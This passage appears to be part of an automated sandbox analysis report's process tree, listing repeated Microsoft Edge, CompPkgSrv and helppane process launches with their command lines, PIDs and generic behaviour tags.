  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:3928
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:1876
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,13700971644656000175,19101529853165022,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
    3⤵
    PID:6284
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,13700971644656000175,19101529853165022,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:5196
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0x9c,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:5260
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
    3⤵
    PID:5412
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5612
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8
    3⤵
    PID:5584
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
    3⤵
    PID:6352
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
    3⤵
    PID:6504
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3852 /prefetch:1
    3⤵
    PID:6816
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4164 /prefetch:1
    3⤵
    PID:7120
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4380 /prefetch:1
    3⤵
    PID:6772
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1
    3⤵
    PID:8184
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1
    3⤵
    PID:4824
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1
    3⤵
    PID:1708
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:1
    3⤵
    PID:1684
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
    3⤵
    PID:3860
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6388 /prefetch:1
    3⤵
    PID:6492
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:1
    3⤵
    PID:6120
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6612 /prefetch:1
    3⤵
    PID:7160
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6616 /prefetch:1
    3⤵
    PID:8164
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6972 /prefetch:1
    3⤵
    PID:2148
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7136 /prefetch:1
    3⤵
    PID:5076
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7344 /prefetch:1
    3⤵
    PID:8264
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7516 /prefetch:1
    3⤵
    PID:8520
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7468 /prefetch:1
    3⤵
    PID:8788
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7756 /prefetch:1
    3⤵
    PID:8920
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7380 /prefetch:1
    3⤵
    PID:9076
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8076 /prefetch:1
    3⤵
    PID:8784
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8836072676729748495,1315251196843800131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8224 /prefetch:1
    3⤵
    PID:8252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:5476
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:5544
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,15234484859527597553,13819955312867282392,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:7156

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6588

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6636

C:\Windows\helppane.exe
C:\Windows\helppane.exe -Embedding
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:7236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:8056
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:8072
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:3920
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:6468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:4852
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:2236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:4832
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xdc,0xd4,0x100,0xd8,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:4520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:2920
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:4928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:408
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:3652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:2188
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:4360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:3328
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:2380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:4660
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:2712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:1732
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0x9c,0x104,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:4060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:6604
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:7692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:8120
